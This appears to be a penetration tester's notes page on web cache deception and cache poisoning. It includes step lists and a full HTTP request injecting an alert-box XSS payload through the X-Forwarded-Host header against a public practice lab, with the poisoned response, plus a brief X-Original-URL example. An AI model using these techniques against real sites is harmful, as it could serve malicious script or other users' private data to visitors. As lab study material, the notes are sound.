Skip to content

Cache

Cache

Things to check:
- Check Response Headers for Cache Information
- Send a malformed Header then test to see if the same HTTP error code is returned when the header is set normally

Cache Deception Attack

Web Servers look at the file extension for setting cache and caching responses.

When trying to access https://www.example.com/account.php/nonexistent.css

How it works:
1. If the server returns home.php when accessing https://www.example.com/home.php/nonexistent.css
2. Have an authenticated user trigger that URL
3. Have a non authenticated user trigger that URL after.
- Check if the non authenticated use sees information cached by the authenticated user.

This can be solved with Edge Cache TTL.
This can be solved with a 404 or 302.
Cache files by their content type

Cache Poisoning

This is to be used as an addon to another attack to save the contents of the data in the cache to serve to other users for a period of time.

The attacker causes the application to store some malicious content in the cache, and this content is served from the cache to other application users.

Basic Example

Make a first request with the XSS then make a regular request that any user would make

Use X-Forwarded-Host Header to XSS page:

GET /basic.php HTTP/2
Host: 51b26edb.poison.digi.ninja:2443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://poison.digi.ninja/
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-site
Sec-Fetch-User: ?1
Pragma: no-cache
Cache-Control: no-cache
X-Forwarded-Host: example.com"><script>alert(1)</script><meta "

Get Results:

HTTP/2 200 OK
date: Sat, 17 Jul 2021 21:43:01 GMT
server: Apache
strict-transport-security: max-age=63072000
vary: Accept-Encoding
content-encoding: gzip
x-content-type-options: nosniff
content-length: 604
content-type: text/html; charset=UTF-8
x-varnish: 128353
age: 0
via: 1.1 varnish (Varnish/6.1)
accept-ranges: bytes
referrer-policy: no-referrer-when-downgrade
X-Firefox-Spdy: h2

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
	<title>Basic - Cache Poisoning Lab</title>
	<link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" /> 
	<link rel="apple-touch-icon" href="/apple-touch-icon.png" />
	<meta property="og:title" content="Basic Poisoning Lab" />
	<meta property="og:type" content="website" />
	<meta property="og:image" content="http://example.com"><script>alert(1)</script><meta "/cms/social.png" />
</head>
<body>
	<h1>Basic Poisoning Lab</h1>
	<p>A random number is: 2041613932</p>
	<p>
		This page loads its open graph image based on the host requested but isn't that clever when working out the host to use.
	</p>
	<p>
		Use this weakness to poison every visitor with a nice bit of Cross-Site Scripting.
	</p>
	<p><a href="/index.php">&laquo; Back to home</a></p>
	<hr />
	<p>
		Lab created by Robin Wood - <a href="https://digi.ninja">DigiNinja</a>
	</p>
</body>
</html>

Regular User Request:

Original URL Example

X-Original-URL: https:\samcurry.net/please//work